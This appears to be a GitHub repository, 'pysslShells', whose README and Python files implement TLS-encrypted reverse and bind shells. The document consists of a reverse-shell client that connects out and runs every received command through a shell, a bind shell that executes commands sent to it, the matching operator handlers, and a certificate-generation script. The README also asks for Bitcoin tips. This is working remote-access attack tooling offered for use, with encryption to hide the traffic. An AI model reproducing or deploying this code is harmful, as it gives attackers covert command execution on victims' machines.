├── README.md
├── bind
    ├── bind_shell.py
    └── connect.py
├── gencrts.sh
└── reverse
    ├── client.py
    └── server.py


/README.md:
--------------------------------------------------------------------------------
 1 | # pysslShells
 2 | Finally, reverse/bind shells written in python, encrypted with ssl!
 3 | 
 4 | ### See also:
 5 | Password protected ssl shells (sha256 via hashlib):
 6 | https://github.com/darkerego/py_password_ssl_shells
 7 | 
 8 | ### Update (October 28th, 2019)
 9 | 
10 | - Added SSL bindshell and handler! 
11 | 
12 | 
13 | ### Updated (October 25th, 2019)
14 | 
15 | - Ported server code to python3 (payload works with either python2 or python3)
16 | - Fixed a bunch of errors and glitches
17 | - Better logic for creating and managing ssl keys
18 | - TODO: Write bind shell
19 | 
20 | 
21 | 
22 | Tips are super appreciated ... 
23 | 
24 | BTC:1F48WFsbCBGuYCopXnBaK9tM7A2JhAWEyw
25 | 


--------------------------------------------------------------------------------
/bind/bind_shell.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import os
 3 | import sys
 4 | import ssl
 5 | from sys import exit
 6 | global client
 7 | global sock
 8 | 
 9 | 
10 | try:
11 |     try:
12 |         port = int(sys.argv[2])
13 |     except:
14 |         port = 9999
15 |     try:
16 |         ip = sys.argv[1]
17 |     except:
18 |         ip = "0.0.0.0"
19 | 
20 |     host = (ip, port)
21 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22 |     sock = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key', ssl_version=ssl.PROTOCOL_TLSv1)
23 |     sock.bind(host)
24 |     sock.listen(1)
25 | 
26 |     while True:
27 |         client, addr = sock.accept()
28 |         prompt = os.getcwd() + "> "
29 |         client.send(prompt.encode())
30 |         while True:
31 |             cmd = client.recv(1024)
32 |             if cmd.decode('utf-8') == 'quit':
33 |                 sock.close()
34 |                 exit(1)
35 | 
36 |             ter = os.popen(cmd.decode('utf-8'))
37 |             res = ""
38 |             for line in ter:
39 |                 res += line
40 |             ret = res + os.getcwd() + "> "
41 |             client.send(ret.encode())
42 | except KeyboardInterrupt:
43 |     try:
44 |         client.send(b"\n\nConnection closed... Goodbye...\n")
45 |     except:
46 |         pass
47 |     sock.close()
48 | except socket.error:
49 |     client.close()
50 | 
51 | 


--------------------------------------------------------------------------------
/bind/connect.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import ssl
 3 | import sys
 4 | from sys import exit
 5 | 
 6 | def socket_create():
 7 |     try:
 8 |         global host
 9 |         global port
10 |         global ssls
11 |         host = '127.0.0.1'
12 |         port = 5600
13 |         s = socket.socket()
14 |         ssls = wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
15 |     except socket.error as msg:
16 |         print("Socket creation error: " + str(msg))
17 | 
18 | 
19 | # Connect to a remote socket
20 | def socket_connect():
21 |     try:
22 |         global host
23 |         global port
24 |         ssls.connect((host, port))
25 |     except socket.error as msg:
26 |         print("Socket connection error: " + str(msg))
27 | 
28 | 
29 | def send_commands(conn):
30 |     while True:
31 |         try:
32 |             cmd = input()
33 |             if cmd == 'quit':
34 |                 conn.send(str.encode('quit'))
35 |                 conn.close()
36 |                 ssls.close()
37 |                 sys.exit()
38 |             if len(str.encode(cmd)) > 0:
39 |                 conn.send(str.encode(cmd))
40 |                 client_response = str(conn.recv(4096).decode())
41 |                 print(client_response, end="")
42 |         except KeyboardInterrupt:
43 |             conn.send(str.encode('quit'))
44 |             conn.close()
45 | 
46 | def main():
47 |     socket_create()
48 |     socket_connect()
49 |     send_commands(ssls)
50 | 
51 | 
52 | main()
53 | 


--------------------------------------------------------------------------------
/gencrts.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | # Generate keys for ssl socket
 3 | test -d ssl|| mkdir ssl >/dev/null 2>&1
 4 | 
 5 | openssl genrsa -des3 -out ssl/server.orig.key 2048
 6 | openssl rsa -in ssl/server.orig.key -out ssl/server.key
 7 | openssl req -new -key ssl/server.key -out ssl/server.csr
 8 | openssl x509 -req -days 365 -in ssl/server.csr -signkey ssl/server.key -out ssl/server.crt
 9 | 
10 | exit
11 | 


--------------------------------------------------------------------------------
/reverse/client.py:
--------------------------------------------------------------------------------
 1 | """
 2 | PySslShell Client - Python2/3 Compatible
 3 | Author: Darkerego <https://github.com/darkerego>
 4 | """
 5 | 
 6 | import os
 7 | import socket
 8 | import subprocess
 9 | import ssl
10 | from sys import exit
11 | 
12 | # Create a socket
13 | def socket_create():
14 |     try:
15 |         global host
16 |         global port
17 |         global ssls
18 |         host = '127.0.0.1'
19 |         port = 9999
20 |         s = socket.socket()
21 |         ssls = wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
22 |     except socket.error as msg:
23 |         print("Socket creation error: " + str(msg))
24 | 
25 | 
26 | # Connect to a remote socket
27 | def socket_connect():
28 |     try:
29 |         global host
30 |         global port
31 |         global s
32 |         ssls.connect((host, port))
33 |     except socket.error as msg:
34 |         print("Socket connection error: " + str(msg))
35 | 
36 | 
37 | # Receive commands from remote server and run on local machine
38 | def receive_commands():
39 |     global s
40 |     while True:
41 |         try:
42 |             data = ssls.recv(1024)
43 |             if data[:].decode("utf-8") == 'quit':
44 |                 ssls.close()
45 |                 exit(0)
46 |             if data[:2].decode("utf-8") == 'cd':
47 |                 os.chdir(data[3:].decode("utf-8"))
48 |             if len(data) > 0:
49 |                 cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE,
50 |                                        stderr=subprocess.PIPE, stdin=subprocess.PIPE)
51 |                 output_bytes = cmd.stdout.read() + cmd.stderr.read()
52 |                 output_str = output_bytes.decode('utf-8')
53 |                 try:
54 |                     ssls.send(str.encode(output_str + str(os.getcwd()) + '> '))
55 |                 except TypeError:
56 |                     output_str = str(output_bytes)  # For Python2 compatibility
57 |                     ssls.send(str.encode(output_str + str(os.getcwd()) + '> '))
58 |         except KeyboardInterrupt:
59 |             ssls.close()
60 |             exit(0)
61 | 
62 | 
63 | def main():
64 |     socket_create()
65 |     socket_connect()
66 |     receive_commands()
67 | 
68 | 
69 | main()
70 | 


--------------------------------------------------------------------------------
/reverse/server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # PySslShell Reverse Shell Server ~ Author: Darkerego <https://github.com/darkerego>
 3 | import socket
 4 | import sys
 5 | import ssl
 6 | cmd = ""
 7 | 
 8 | 
 9 | def socket_create():
10 |     try:
11 |         global host
12 |         global port
13 |         global s
14 |         host = ''
15 |         port = 9999
16 |         s = socket.socket()
17 |         s = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key', ssl_version=ssl.PROTOCOL_TLSv1)
18 |     except socket.error as msg:
19 |         print("Socket creation error: " + str(msg))
20 | 
21 | 
22 | # Bind socket to port (the host and port the communication will take place) and wait for connection from client
23 | def socket_bind():
24 |     try:
25 |         global host
26 |         global port
27 |         global s
28 |         print("Binding socket to port: " + str(port))
29 |         try:
30 |             s.bind((host, port))
31 |         except OSError:
32 |             print('Address already in use, quitting...')
33 |             exit(1)
34 |         else:
35 |             s.listen(5)
36 |     except socket.error as msg:
37 |         print("Socket binding error: " + str(msg) + "\n" + "Retrying...")
38 |         socket_bind()
39 | 
40 | 
41 | # Establish connection with client (socket must be listening for them)
42 | def socket_accept():
43 |     conn, address = s.accept()
44 |     print("Connection has been established | " + "IP " + address[0] + " | Port " + str(address[1]))
45 |     send_commands(conn)
46 |     conn.close()
47 | 
48 | 
49 | # Send commands
50 | def send_commands(conn):
51 |     while True:
52 |         try:
53 |             cmd = input()
54 |             if cmd == 'quit':
55 |                 conn.send(str.encode('quit'))
56 |                 conn.close()
57 |                 s.close()
58 |                 sys.exit()
59 |             if len(str.encode(cmd)) > 0:
60 |                 conn.send(str.encode(cmd))
61 |                 client_response = str(conn.recv(1024).decode())
62 |                 print(client_response, end="")
63 |         except KeyboardInterrupt:
64 |             conn.send(str.encode('quit'))
65 |             conn.close()
66 | 
67 | 
68 | 
69 | def main():
70 |     socket_create()
71 |     socket_bind()
72 |     socket_accept()
73 | 
74 | 
75 | main()
76 | 


--------------------------------------------------------------------------------